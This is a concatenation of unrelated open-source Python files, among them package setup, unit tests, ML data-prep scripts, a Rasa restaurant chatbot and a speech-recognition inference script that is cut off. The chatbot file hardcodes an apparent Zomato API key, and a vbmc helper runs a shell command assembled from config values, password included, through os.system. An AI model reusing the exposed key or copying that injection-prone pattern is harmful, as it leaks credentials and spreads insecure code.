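# fields as implied by the split above (the sample string is made up):
#
#     doc = TextExtractor().craft('episode-42[SEP]some dialogue line')
#     # doc['text'] == 'some dialogue line'
#     # doc['meta_info'] == b'episode-42[SEP]some dialogue line'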
| 381 |
setup.py
|
seiren87/yangsgoogle
| 0 |
2170050
|
from setuptools import setup, find_packages
setup(
name='yangsgoogle',
version='0.0.2',
description='Google API Wrapper',
long_description='Google API Wrapper',
keywords=['util', 'google'],
license='MIT',
python_requires='>=3.5',
author='seiren87',
author_email='<EMAIL>',
url='https://github.com/seiren87/yangsgoogle',
install_requires=[
'google-api-python-client==1.6.7',
'yangsutil==0.1.0'
],
packages=find_packages(
exclude=['test*']
),
zip_safe=False,
entry_points={
'console_scripts': [
'yangsgoogle=yangsgoogle.generator:main',
],
},
classifiers=[
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
)
| 934 |
tests/test_basics.py
|
jmuhlich/pyjnius_indra
| 0 |
2169763
|
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import unittest
from jnius.reflect import autoclass
class BasicsTest(unittest.TestCase):
def test_static_methods(self):
Test = autoclass('org.jnius.BasicsTest')
self.assertEquals(Test.methodStaticZ(), True)
self.assertEquals(Test.methodStaticB(), 127)
self.assertEquals(Test.methodStaticC(), 'k')
self.assertEquals(Test.methodStaticS(), 32767)
self.assertEquals(Test.methodStaticI(), 2147483467)
self.assertEquals(Test.methodStaticJ(), 2147483467)
self.assertAlmostEquals(Test.methodStaticF(), 1.23456789)
self.assertEquals(Test.methodStaticD(), 1.23456789)
self.assertEquals(Test.methodStaticString(), 'helloworld')
def test_static_fields(self):
Test = autoclass('org.jnius.BasicsTest')
self.assertEquals(Test.fieldStaticZ, True)
self.assertEquals(Test.fieldStaticB, 127)
self.assertEquals(Test.fieldStaticC, 'k')
self.assertEquals(Test.fieldStaticS, 32767)
self.assertEquals(Test.fieldStaticI, 2147483467)
self.assertEquals(Test.fieldStaticJ, 2147483467)
self.assertAlmostEquals(Test.fieldStaticF, 1.23456789)
self.assertEquals(Test.fieldStaticD, 1.23456789)
self.assertEquals(Test.fieldStaticString, 'helloworld')
def test_instance_methods(self):
test = autoclass('org.jnius.BasicsTest')()
self.assertEquals(test.methodZ(), True)
self.assertEquals(test.methodB(), 127)
self.assertEquals(test.methodC(), 'k')
self.assertEquals(test.methodS(), 32767)
self.assertEquals(test.methodI(), 2147483467)
self.assertEquals(test.methodJ(), 2147483467)
self.assertAlmostEquals(test.methodF(), 1.23456789)
self.assertEquals(test.methodD(), 1.23456789)
self.assertEquals(test.methodString(), 'helloworld')
def test_instance_fields(self):
test = autoclass('org.jnius.BasicsTest')()
self.assertEquals(test.fieldZ, True)
self.assertEquals(test.fieldB, 127)
self.assertEquals(test.fieldC, 'k')
self.assertEquals(test.fieldS, 32767)
self.assertEquals(test.fieldI, 2147483467)
self.assertEquals(test.fieldJ, 2147483467)
self.assertAlmostEquals(test.fieldF, 1.23456789)
self.assertEquals(test.fieldD, 1.23456789)
self.assertEquals(test.fieldString, 'helloworld')
test2 = autoclass('org.jnius.BasicsTest')(10)
self.assertEquals(test2.fieldB, 10)
self.assertEquals(test.fieldB, 127)
self.assertEquals(test2.fieldB, 10)
def test_instance_set_fields(self):
test = autoclass('org.jnius.BasicsTest')()
test.fieldSetZ = True
test.fieldSetB = 127
test.fieldSetC = ord('k')
test.fieldSetS = 32767
test.fieldSetI = 2147483467
test.fieldSetJ = 2147483467
test.fieldSetF = 1.23456789
test.fieldSetD = 1.23456789
self.assertTrue(test.testFieldSetZ())
self.assertTrue(test.testFieldSetB())
self.assertTrue(test.testFieldSetC())
self.assertTrue(test.testFieldSetS())
self.assertTrue(test.testFieldSetI())
self.assertTrue(test.testFieldSetJ())
self.assertTrue(test.testFieldSetF())
self.assertTrue(test.testFieldSetD())
def test_instances_methods_array(self):
test = autoclass('org.jnius.BasicsTest')()
self.assertEquals(test.methodArrayZ(), [True] * 3)
self.assertEquals(test.methodArrayB()[0], 127)
self.assertEquals(test.methodArrayB(), [127] * 3)
self.assertEquals(test.methodArrayC(), ['k'] * 3)
self.assertEquals(test.methodArrayS(), [32767] * 3)
self.assertEquals(test.methodArrayI(), [2147483467] * 3)
self.assertEquals(test.methodArrayJ(), [2147483467] * 3)
ret = test.methodArrayF()
ref = [1.23456789] * 3
self.assertAlmostEquals(ret[0], ref[0])
self.assertAlmostEquals(ret[1], ref[1])
self.assertAlmostEquals(ret[2], ref[2])
self.assertEquals(test.methodArrayD(), [1.23456789] * 3)
self.assertEquals(test.methodArrayString(), ['helloworld'] * 3)
def test_instances_methods_params(self):
test = autoclass('org.jnius.BasicsTest')()
self.assertEquals(test.methodParamsZBCSIJFD(
True, 127, 'k', 32767, 2147483467, 2147483467, 1.23456789, 1.23456789), True)
self.assertEquals(test.methodParamsString('helloworld'), True)
self.assertEquals(test.methodParamsArrayI([1, 2, 3]), True)
self.assertEquals(test.methodParamsArrayString([
'hello', 'world']), True)
def test_instances_methods_params_object_list_str(self):
test = autoclass('org.jnius.BasicsTest')()
self.assertEquals(test.methodParamsObject([
'hello', 'world']), True)
def test_instances_methods_params_object_list_int(self):
test = autoclass('org.jnius.BasicsTest')()
self.assertEquals(test.methodParamsObject([1, 2]), True)
def test_instances_methods_params_object_list_float(self):
test = autoclass('org.jnius.BasicsTest')()
self.assertEquals(test.methodParamsObject([3.14, 1.61]), True)
def test_instances_methods_params_object_list_long(self):
test = autoclass('org.jnius.BasicsTest')()
self.assertEquals(test.methodParamsObject([1, 2]), True)
def test_instances_methods_params_array_byte(self):
test = autoclass('org.jnius.BasicsTest')()
self.assertEquals(test.methodParamsArrayByte([127, 127, 127]), True)
ret = test.methodArrayB()
self.assertEquals(test.methodParamsArrayByte(ret), True)
def test_return_array_as_object_array_of_strings(self):
test = autoclass('org.jnius.BasicsTest')()
self.assertEquals(test.methodReturnStrings(), ['Hello', 'world'])
def test_return_array_as_object_of_integers(self):
test = autoclass('org.jnius.BasicsTest')()
self.assertEquals(test.methodReturnIntegers(), [1, 2])
| 6,134 |
tests/test_sound/test_sound_tracker.py
|
janbrrr/dndj
| 8 |
2169878
|
import asyncio
import pytest
from src.sound.sound_tracker import SoundTracker
class TestSoundTracker:
def test_get_sound_key(self):
tracker = SoundTracker()
assert tracker._get_sound_key(0, 0) == "0-0"
assert tracker._get_sound_key(1, 0) == "1-0"
assert tracker._get_sound_key(0, 1) == "0-1"
async def test_register_sound(self, loop):
tracker = SoundTracker()
task = loop.create_task(asyncio.sleep(0.001))
tracker.register_sound(0, 1, task)
assert tracker.sound_to_task[tracker._get_sound_key(0, 1)] == task
async def test_register_sound_raises_if_task_done(self, loop):
tracker = SoundTracker()
task = loop.create_task(asyncio.sleep(0.001))
await task
with pytest.raises(RuntimeError):
tracker.register_sound(0, 0, task)
async def test_automatically_unregisters_sound_if_done(self, loop):
tracker = SoundTracker()
task = loop.create_task(asyncio.sleep(0.001))
tracker.register_sound(0, 1, task)
key = tracker._get_sound_key(0, 1)
assert tracker.sound_to_task[tracker._get_sound_key(0, 1)] == task
await task
assert key not in tracker.sound_to_task
async def test_unregister_sound_raises_if_task_not_done(self, loop):
tracker = SoundTracker()
task = loop.create_task(asyncio.sleep(0.001))
tracker.register_sound(0, 1, task)
with pytest.raises(RuntimeError):
tracker._unregister_sound(0, 1, None)
async def test_cancel_sound_cancels_task(self, loop):
tracker = SoundTracker()
task = loop.create_task(asyncio.sleep(0.001))
key = tracker._get_sound_key(0, 1)
tracker.register_sound(0, 1, task)
assert key in tracker.sound_to_task
await tracker.cancel_sound(0, 1)
assert task.cancelled()
assert key not in tracker.sound_to_task
async def test_active_sounds(self, loop):
tracker = SoundTracker()
assert len(tracker.active_sounds) == 0
task = loop.create_task(asyncio.sleep(0.001))
tracker.register_sound(0, 1, task)
assert len(tracker.active_sounds) == 1
assert tracker.active_sounds[0]
| 2,240 |
room_occupancy_model/classification_model.py
|
sharabhshukla/room_occupancy_prediction
| 0 |
2169902
|
import joblib
import os
import dotenv
import sys
from room_occupancy_model.preprocessors import classifier_pipeline
from room_occupancy_model.preprocessors import pipe_preprocessors as pp
dotenv.load_dotenv()
class prediction_model():
def __init__(self):
home_dir = os.environ.get("pkg_root_dir")
model_path = os.path.join(home_dir, 'room_occupancy_model/models/prediction_pipeline.sav')
self._model = joblib.load(model_path)
def predict(self, X):
return self._model.predict(X)
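# A minimal usage sketch; the feature column names below are hypothetical
# placeholders, the real pipeline expects whatever columns it was trained on:
#
#     import pandas as pd
#     model = prediction_model()
#     X = pd.DataFrame([{'Temperature': 23.1, 'Humidity': 27.2,
#                        'Light': 430.0, 'CO2': 720.0}])
#     print(model.predict(X))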
| 526 |
hack/deploy-hub-local/helpers/vbmc.py
|
borball/ztp-pipeline-relocatable
| 0 |
2169724
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import yaml
installfile = "/root/install-config.yaml"
with open(installfile) as f:
data = yaml.safe_load(f)
uri = data["platform"]["baremetal"]["libvirtURI"]
hosts = data["platform"]["baremetal"]["hosts"]
for host in hosts:
name = host["name"]
address = host["bmc"]["address"].replace("ipmi://", "")
if not address.startswith("DONTCHANGEME"):
continue
if ":" in address:
address, port = address.split(":")
port = "--port %s" % port
else:
port = ""
username = host["bmc"]["username"]
password = host["bmc"]["password"]
cmd = (
"vbmc add %s %s --username %s --password %s --libvirt-uri %s; vbmc start %s"
% (name, port, username, password, uri, name)
)
os.system(cmd)
| 892 |
jarbas/core/urls.py
|
cclauss/serenata-de-amor
| 0 |
2169387
|
from django.conf.urls import url
from jarbas.core.views import CompanyDetailView
urlpatterns = [
url(
r'^company/(?P<cnpj>\d{14})/$',
CompanyDetailView.as_view(),
name='company-detail'
),
]
| 225 |
training/barcodes/scripts/prepare_training_data.py
|
acuacal/poreplex
| 76 |
2170186
|
#!/usr/bin/env python3
#
# Copyright (c) 2018 Institute for Basic Science
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import pandas as pd
import numpy as np
import subprocess as sp
import tempfile
import shutil
import h5py
import glob
import sys
import os
from concurrent import futures
OUTPUT_DTYPE = np.float32
PAD_VALUE = -1000.
class TemporaryDirectory(object):
def __init__(self, root='.'):
self.root = root
self.path = None
def __enter__(self):
self.path = tempfile.mkdtemp(dir=self.root)
return self
def __exit__(self, type, value, traceback):
if self.path is not None:
shutil.rmtree(self.path)
def __str__(self):
return self.path
def all_files(self):
return sorted(glob.glob(os.path.join(self.path, 'part*')))
def merge_into_file(self, outfile):
infiles = self.all_files()
if infiles:
sp.check_call(['cat'] + infiles, stdout=outfile)
def normalize_signal(sig):
med = np.median(sig)
mad = np.median(np.abs(sig - med))
return (sig - med) / max(0.01, (mad * 1.4826))
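# Note: 1.4826 * MAD approximates the standard deviation for Gaussian data, so
# normalize_signal() is a robust (median/MAD) analogue of z-scoring; the
# max(0.01, ...) guard prevents division by zero on nearly constant signals.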
def process(signal_file, signal_trim_length, output_path, read_ids):
with h5py.File(signal_file, 'r') as h5, open(output_path, 'wb') as arrayout:
sigbuf = []
siggroup = h5['adapter']
for read_id in read_ids:
signal = siggroup['{}/{}'.format(read_id[:3], read_id)][:]
if len(signal) < signal_trim_length:
signal = np.pad(normalize_signal(signal),
(signal_trim_length - len(signal), 0), 'constant',
constant_values=PAD_VALUE)
elif len(signal) > signal_trim_length:
signal = normalize_signal(signal[-signal_trim_length:])
else:
signal = normalize_signal(signal)
sigbuf.append(signal.astype(OUTPUT_DTYPE))
np.array(sigbuf).tofile(arrayout)
return len(read_ids)
def main(signal_file, signal_trim_length, catalog_input, output_file,
parallel=8, chunk_size=2000):
selreads = pd.read_table(catalog_input)
with futures.ProcessPoolExecutor(parallel) as executor, \
TemporaryDirectory() as tmpdir:
jobs = []
jobbases = np.arange(int(np.ceil(len(selreads) / chunk_size))) * chunk_size
for jobbase in jobbases:
job = executor.submit(process, signal_file, signal_trim_length,
'{}/part{:012d}'.format(tmpdir, jobbase),
selreads['read_id'].iloc[jobbase:jobbase+chunk_size].tolist())
jobs.append(job)
done = 0
for job in jobs:
done += job.result()
print('\r{:,} / {:,} files ({:.2f}%)'.format(
done, len(selreads), done / len(selreads) * 100), end='')
sys.stdout.flush()
print('\nMerging...')
tmpdir.merge_into_file(open('{}/merged'.format(tmpdir), 'wb'))
print('\nConverting...')
elementsize = signal_trim_length
arr = np.frombuffer(open('{}/merged'.format(tmpdir), 'rb').read(),
dtype=OUTPUT_DTYPE)
arr = arr.reshape(len(arr) // elementsize, elementsize)
np.save(output_file, arr)
if __name__ == '__main__':
# (signal_file, signal_trim_length, catalog_input,
# output_file, num_parallel) = (
# '../MXG3.1/adapter-dumps/inventory.h5', 350,
# '../tables/selected-signal-matches-MXG3.1.txt',
# 'tr.npy', 8)
(signal_file, signal_trim_length, catalog_input,
output_file, num_parallel) = sys.argv[1:]
signal_trim_length = int(signal_trim_length)
num_parallel = int(num_parallel)
main(signal_file, signal_trim_length, catalog_input, output_file,
num_parallel)
| 4,813 |
scripts/userSetup.py
|
robertjoosten/maya-orm
| 11 |
2170178
|
import logging
from maya.api import OpenMaya
log = logging.getLogger("mango")
def initialize(*args, **kwargs):
"""
    The initialize function is a wrapper around the initialize function in
    mango. Because the entire mango package may be reloaded, the import
    statement is done inside the function itself.
"""
from mango import scene
scene.initialize()
def register_scene_callbacks():
"""
    Register scene callbacks that process the current scene when triggered.
The current scene will be read and all mango models initialized.
"""
OpenMaya.MSceneMessage.addCallback(OpenMaya.MSceneMessage.kAfterImport, initialize)
OpenMaya.MSceneMessage.addCallback(OpenMaya.MSceneMessage.kAfterOpen, initialize)
OpenMaya.MSceneMessage.addCallback(OpenMaya.MSceneMessage.kAfterCreateReference, initialize)
OpenMaya.MSceneMessage.addCallback(OpenMaya.MSceneMessage.kAfterLoadReference, initialize)
log.info("Scene callbacks registered.")
register_scene_callbacks()
| 1,020 |
Configuration/Eras/python/Era_Phase2C17I13M9_cff.py
|
PKUfudawei/cmssw
| 1 |
2169132
|
import FWCore.ParameterSet.Config as cms
from Configuration.Eras.Era_Phase2C11I13M9_cff import Phase2C11I13M9
from Configuration.Eras.Modifier_phase2_hgcalV12_cff import phase2_hgcalV12
from Configuration.Eras.Modifier_phase2_hgcalV16_cff import phase2_hgcalV16
Phase2C17I13M9 = cms.ModifierChain(Phase2C11I13M9.copyAndExclude([phase2_hgcalV12]),phase2_hgcalV16)
| 365 |
actions.py
|
aniketbangar/Rasa-Chatbot
| 0 |
2169953
|
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from rasa_sdk import Action
from rasa_sdk.events import SlotSet
import json
from flask_mail_send import send_email
import zomatopy
import pandas as pd
# Zomato Config start
config={"user_key":""} #Enter Zomato token
zomato = zomatopy.initialize_app(config)
# Zomato Config end
# Email Config start
def Config():
gmail_user = '' # Gmail Username
gmail_pwd = '' #APP Password
gmail_config = (gmail_user, gmail_pwd)
return gmail_config
# Email Config end
city_dict = ['Ahmedabad','Bangalore','Chennai','Delhi','Hyderabad','Kolkata','Mumbai','Pune','Agra','Ajmer',
'Aligarh','Allahabad','Amravati','Amritsar','Asansol','Aurangabad','Bareilly','Belgaum','Bhavnagar','Bhiwandi',
'Bhopal','Bhubaneswar','Bikaner','Bokaro Steel City','Chandigarh','Coimbatore','Cuttack','Dehradun','Dhanbad',
'Durg-Bhilai Nagar','Durgapur','Erode','Faridabad','Firozabad','Ghaziabad','Gorakhpur','Gulbarga','Guntur',
'Gurgaon','Guwahati','Gwalior','Hubli-Dharwad','Indore','Jabalpur','Jaipur','Jalandhar','Jammu','Jamnagar','Jamshedpur',
'Jhansi','Jodhpur','Kannur','Kanpur','Kakinada','Kochi','Kottayam','Kolhapur','Kollam','Kota','Kozhikode','Kurnool',
'Lucknow','Ludhiana','Madurai','Malappuram','Mathura','Goa','Mangalore','Meerut','Moradabad','Mysore','Nagpur','Nanded','Nashik',
'Nellore','Noida','Palakkad','Patna','Pondicherry','Raipur','Rajkot','Rajahmundry','Ranchi','Rourkela','Salem','Sangli','Siliguri',
'Solapur','Srinagar','Sultanpur','Surat','Thiruvananthapuram','Thrissur','Tiruchirappalli','Tirunelveli','Tiruppur','Ujjain','Vijayapura',
'Vadodara','Varanasi','Vasai-Virar City','Vijayawada','Visakhapatnam','Warangal']
city_dict = [x.lower() for x in city_dict]
cuisines_dict={'american': 1,'chinese': 25, 'north indian': 50, 'italian': 55, 'mexican': 73, 'south indian': 85, 'thai': 95}
class ActionSearchRestaurants(Action):
def name(self):
return 'action_restaurant'
def run(self, dispatcher, tracker, domain):
loc = tracker.get_slot('location')
cuisine = tracker.get_slot('cuisine')
price = tracker.get_slot('price')
global restaurants
print(loc, cuisine, price)
restaurants = zomatorRestoSearch(loc, cuisine, price)
top5 = restaurants.head(5)
# top 5 results to display
if len(top5)>0:
response = 'Showing you top results:' + "\n"
for index, row in top5.iterrows():
response = response + str(row["restaurant_name"]) + ' in ' + row['restaurant_address'] + ' has been rated ' + row['restaurant_rating'] +"\n"
# response = response + "\nShould i mail you the details"
dispatcher.utter_message(str(response))
return [SlotSet('result_found',True)]
else:
response = 'No restaurants found'
dispatcher.utter_message(str(response))
return [SlotSet('result_found',False)]
class SendMail(Action):
def name(self):
return 'email_restaurant_details'
def run(self, dispatcher, tracker, domain):
recipient = tracker.get_slot('email')
top10 = restaurants.head(10)
print("Sending email to {}".format(recipient))
send_email(recipient, top10)
dispatcher.utter_message("Sent. Bon Appetit!")
class Check_location(Action):
def name(self):
return 'action_check_location'
def run(self, dispatcher, tracker, domain):
loc = tracker.get_slot('location')
print("Check location",loc)
check= {'location_f' : 'notfound', 'location_new' : None}
config={"user_key":"f4924dc9ad672ee8c4f8c84743301af5"}
zomato = zomatopy.initialize_app(config)
location_detail=zomato.get_location(loc, 1)
location_json = json.loads(location_detail)
print(location_json)
if 'location_suggestions' in location_json:
location_results = len(location_json['location_suggestions'])
if location_results ==0:
check= {'location_f' : 'notfound', 'location_new' : None}
elif loc.lower() not in city_dict:
check= {'location_f' : 'tier3', 'location_new' : None}
else:
check= {'location_f' : 'found', 'location_new' : loc}
else:
check= {'location_f' : 'notfound', 'location_new' : None}
return [SlotSet('location',check['location_new']), SlotSet('location_found',check['location_f'])]
class Check_cuisine(Action):
def name(self):
return 'action_check_cuisine'
def run(self, dispatcher, tracker, domain):
cuisine = tracker.get_slot('cuisine')
print("Check Cusine",cuisine)
        if cuisine is None or cuisine.lower() not in cuisines_dict:
            return [SlotSet('cuisine_not_found', True)]
        return [SlotSet('cuisine_not_found', False)]
def zomatorRestoSearch(loc,cuisine,price):
location_detail=zomato.get_location(loc, 1)
location_json = json.loads(location_detail)
location_results = len(location_json['location_suggestions'])
lat=location_json["location_suggestions"][0]["latitude"]
lon=location_json["location_suggestions"][0]["longitude"]
city_id=location_json["location_suggestions"][0]["city_id"]
list1 = [0,20,40,60,80]
d = []
df = pd.DataFrame()
results = zomato.restaurant_search("", lat, lon, str(cuisines_dict.get(cuisine)))
d1 = json.loads(results)
# print("d1",d1)
d = d1['restaurants']
df1 = pd.DataFrame([{'restaurant_name': x['restaurant']['name'], 'restaurant_rating': x['restaurant']['user_rating']['aggregate_rating'],
'restaurant_address': x['restaurant']['location']['address'],'budget_for2people': x['restaurant']['average_cost_for_two'],
'restaurant_photo': x['restaurant']['featured_image'], 'restaurant_url': x['restaurant']['url'] } for x in d])
    df = pd.concat([df, df1])
def budget_group(row):
if row['budget_for2people'] <300 :
return 'lesser than 300'
elif 300 <= row['budget_for2people'] <700 :
return 'between 300 to 700'
else:
return 'more than 700'
df['budget'] = df.apply(lambda row: budget_group (row),axis=1)
#sorting by review & filter by budget
restaurant_df = df[(df.budget == price)]
restaurant_df = restaurant_df.sort_values(['restaurant_rating'], ascending=0)
return restaurant_df
| 5,883 |
tests/tasks/github_stats/task_test.py
|
alysivji/busy-beaver
| 22 |
2168679
|
from typing import List
import pytest
from busy_beaver.adapters.slack import Channel
from busy_beaver.models import ApiUser
from busy_beaver.tasks.github_stats.task import (
start_post_github_summary_task,
fetch_github_summary_post_to_slack,
)
MODULE_TO_TEST = "busy_beaver.tasks.github_stats.task"
#######################
# Test Trigger Function
#######################
@pytest.fixture
def patched_background_task(patcher, create_fake_background_task):
return patcher(
MODULE_TO_TEST,
namespace=fetch_github_summary_post_to_slack.__name__,
replacement=create_fake_background_task(),
)
@pytest.mark.unit
def test_start_post_github_summary_task(
session, patched_background_task, create_api_user
):
"""Test trigger function"""
# Arrange
api_user = create_api_user("admin")
channel_name = "test-channel"
# Act
start_post_github_summary_task(api_user, channel_name)
# Assert
api_user = ApiUser.query.get(api_user.id)
task = api_user.tasks[0]
assert task.job_id == patched_background_task.id
assert task.data["channel_name"] == channel_name
assert "boundary_dt" in task.data
#####################
# Test Background Job
#####################
@pytest.fixture
def patched_slack(mocker, patcher):
class FakeSlackClient:
def __init__(self, *, channel_info):
self.mock = mocker.MagicMock()
if channel_info:
self.channel_info = channel_info
def get_channel_info(self, *args, **kwargs):
self.mock(*args, **kwargs)
return self.channel_info
def post_message(self, *args, **kwargs):
self.mock(*args, **kwargs)
return
def __repr__(self):
return "<FakeSlackClient>"
def _wrapper(*, channel_info=None):
obj = FakeSlackClient(channel_info=channel_info)
return patcher(MODULE_TO_TEST, namespace="slack", replacement=obj)
return _wrapper
@pytest.fixture
def patched_github_user_events(mocker, patcher):
class FakeGitHubUserEvents:
def __init__(self, *, summary_messages: List[str]):
self.mock = mocker.MagicMock(side_effect=list(summary_messages))
def generate_summary_text(self, *args, **kwargs):
return self.mock(*args, **kwargs)
def __call__(self, *args, **kwargs):
return self
def __repr__(self):
return "<FakeGitHubUserEvents>"
def _wrapper(*, messages=None):
obj = FakeGitHubUserEvents(summary_messages=messages)
return patcher(MODULE_TO_TEST, namespace="GitHubUserEvents", replacement=obj)
return _wrapper
@pytest.mark.unit
def test_fetch_github_summary_post_to_slack_with_no_users(
session, t_minus_one_day, patched_slack, patched_github_user_events
):
# Arrange
boundary_dt = t_minus_one_day
channel_info = Channel(name="general", id="idz", members=["user1", "user2"])
slack = patched_slack(channel_info=channel_info)
patched_github_user_events(messages=["a", "b"])
# Act
fetch_github_summary_post_to_slack("general", boundary_dt=boundary_dt)
# Assert
post_message_args = slack.mock.call_args_list[-1]
args, kwargs = post_message_args
assert "does it make a sound" in kwargs["message"]
assert "idz" in kwargs["channel_id"]
@pytest.mark.unit
def test_fetch_github_summary_post_to_slack_with_no_activity(
session, create_user, t_minus_one_day, patched_slack, patched_github_user_events
):
# Arrange
boundary_dt = t_minus_one_day
create_user(slack_id="user1", github_username="user1")
channel_info = Channel(name="general", id="idz", members=["user1", "user2"])
slack = patched_slack(channel_info=channel_info)
patched_github_user_events(messages=[""])
# Act
fetch_github_summary_post_to_slack("general", boundary_dt=boundary_dt)
# Assert
post_message_args = slack.mock.call_args_list[-1]
args, kwargs = post_message_args
assert "does it make a sound" in kwargs["message"]
@pytest.mark.unit
def test_fetch_github_summary_post_to_slack_with_activity(
session, create_user, t_minus_one_day, patched_slack, patched_github_user_events
):
# Arrange
boundary_dt = t_minus_one_day
create_user(slack_id="user1", github_username="user1")
create_user(slack_id="user2", github_username="user2")
channel_info = Channel(name="general", id="idz", members=["user1", "user2"])
slack = patched_slack(channel_info=channel_info)
patched_github_user_events(messages=["a", "b"])
# Act
fetch_github_summary_post_to_slack("general", boundary_dt=boundary_dt)
# Assert
post_message_args = slack.mock.call_args_list[-1]
args, kwargs = post_message_args
assert "ab" in kwargs["message"]
@pytest.mark.vcr()
@pytest.mark.freeze_time("2019-03-31")
@pytest.mark.integration
def test_post_github_summary_task__integration(
session, create_user, t_minus_one_day, patched_slack
):
channel_info = Channel(name="general", id="idz", members=["user1", "user2"])
slack = patched_slack(channel_info=channel_info)
create_user(slack_id="user1", github_username="alysivji")
# Act
fetch_github_summary_post_to_slack("general", boundary_dt=t_minus_one_day)
# Assert
post_message_args = slack.mock.call_args_list[-1]
args, kwargs = post_message_args
assert "<@user1>" in kwargs["message"]
| 5,426 |
examples/directivities/cardioid_function.py
|
Womac/pyroomacoustics
| 915 |
2168171
|
import numpy as np
import matplotlib.pyplot as plt
from pyroomacoustics import dB, all_combinations
from pyroomacoustics.directivities import cardioid_func
from pyroomacoustics.doa import spher2cart
azimuth = np.radians(np.linspace(start=0, stop=360, num=361, endpoint=True))
colatitude = np.radians(np.linspace(start=0, stop=180, num=180, endpoint=True))
lower_gain = -40
""" 2D """
# get cartesian coordinates
cart = spher2cart(azimuth=azimuth)
direction = spher2cart(azimuth=225, degrees=True)
# compute response
resp = cardioid_func(x=cart, direction=direction, coef=0.5, magnitude=True)
resp_db = dB(np.array(resp))
# plot
plt.figure()
plt.polar(azimuth, resp_db)
plt.ylim([lower_gain, 0])
ax = plt.gca()
ax.yaxis.set_ticks(np.arange(start=lower_gain, stop=5, step=10))
plt.tight_layout()
""" 3D """
# get cartesian coordinates
spher_coord = all_combinations(azimuth, colatitude)
cart = spher2cart(azimuth=spher_coord[:, 0], colatitude=spher_coord[:, 1])
direction = spher2cart(azimuth=0, colatitude=45, degrees=True)
# compute response
resp = cardioid_func(x=cart, direction=direction, coef=0.25, magnitude=True)
# plot (surface plot)
fig = plt.figure()
RESP_2D = resp.reshape(len(azimuth), len(colatitude))
AZI, COL = np.meshgrid(azimuth, colatitude)
X = RESP_2D.T * np.sin(COL) * np.cos(AZI)
Y = RESP_2D.T * np.sin(COL) * np.sin(AZI)
Z = RESP_2D.T * np.cos(COL)
ax = fig.add_subplot(1, 1, 1, projection="3d")
ax.plot_surface(X, Y, Z)
ax.set_xlabel("x")
ax.set_ylabel("y")
ax.set_zlabel("z")
ax.set_xlim([-1, 1])
ax.set_ylim([-1, 1])
ax.set_zlim([-1, 1])
plt.show()
| 1,583 |
speech_recognition/run/inference.py
|
cosmoquester/speech-recognition
| 6 |
2170098
|
import argparse
import csv
import sys
from functools import partial
import tensorflow as tf
import tensorflow_text as text
import yaml
from ..configs import DataConfig, get_model_config
from ..data import delta_accelerate, load_audio_file
from ..models import LAS, DeepSpeech2
from ..search import DeepSpeechSearcher, LAS_Searcher
from ..utils import get_device_strategy, get_logger
# fmt: off
parser = argparse.ArgumentParser("This is script to inferece (generate sentence) with seq2seq model")
parser.add_argument("--data-config", type=str, required=True, help="data processing config file")
parser.add_argument("--model-config", type=str, required=True, help="model config file")
parser.add_argument("--audio-files", required=True, help="an audio file or glob pattern of multiple files ex) *.pcm")
parser.add_argument("--model-path", type=str, required=True, help="pretrained model checkpoint")
parser.add_argument("--output-path", default="output.tsv", help="output tsv file path to save generated sentences")
parser.add_argument("--sp-model-path", type=str, required=True, help="sentencepiece model path")
parser.add_argument("--batch-size", type=int, default=512)
parser.add_argument("--beam-size", type=int, default=0, help="not given, use greedy search else beam search with this value as beam size")
parser.add_argument("--mixed-precision", action="store_true", help="Use mixed precision FP16")
parser.add_argument("--device", type=str, default="CPU", help="device to train model")
# fmt: on
def main(args: argparse.Namespace):
strategy = get_device_strategy(args.device)
logger = get_logger("inference")
if args.mixed_precision:
mixed_type = "mixed_bfloat16" if args.device == "TPU" else "mixed_float16"
policy = tf.keras.mixed_precision.experimental.Policy(mixed_type)
tf.keras.mixed_precision.experimental.set_policy(policy)
logger.info("[+] Use Mixed Precision FP16")
# Construct Dataset
with tf.io.gfile.GFile(args.sp_model_path, "rb") as f:
tokenizer = text.SentencepieceTokenizer(f.read(), add_bos=True, add_eos=True)
bos_id, eos_id = tokenizer.tokenize("").numpy().tolist()
dataset_files = sorted(tf.io.gfile.glob(args.audio_files))
if not dataset_files:
logger.error("[Error] Dataset path is invalid!")
sys.exit(1)
# Load Config
logger.info(f"Load Data Config from {args.data_config}")
config = DataConfig.from_yaml(args.data_config)
with strategy.scope():
dataset = (
tf.data.Dataset.from_tensor_slices(dataset_files)
.map(load_audio_file(config.sample_rate, config.file_format, config.sample_rate))
.map(config.audio_feature_fn, num_parallel_calls=tf.data.experimental.AUTOTUNE)
)
# Delta Accelerate
if config.use_delta_accelerate:
logger.info("[+] Use delta and deltas accelerate")
dataset = dataset.map(delta_accelerate)
dataset = dataset.padded_batch(args.batch_size, [None, config.frequency_dim, config.feature_dim]).prefetch(
tf.data.experimental.AUTOTUNE
)
# Model Initialize & Load pretrained model
model_config = get_model_config(args.model_config)
model = model_config.create_model()
model_input, _ = model.make_example(
tf.keras.Input([None, config.frequency_dim, config.feature_dim], dtype=tf.float32),
tf.keras.Input([None], dtype=tf.int32),
)
model(model_input)
tf.train.Checkpoint(model).restore(args.model_path).expect_partial()
logger.info(f"Loaded weights of model from {args.model_path}")
model.summary()
if isinstance(model, LAS):
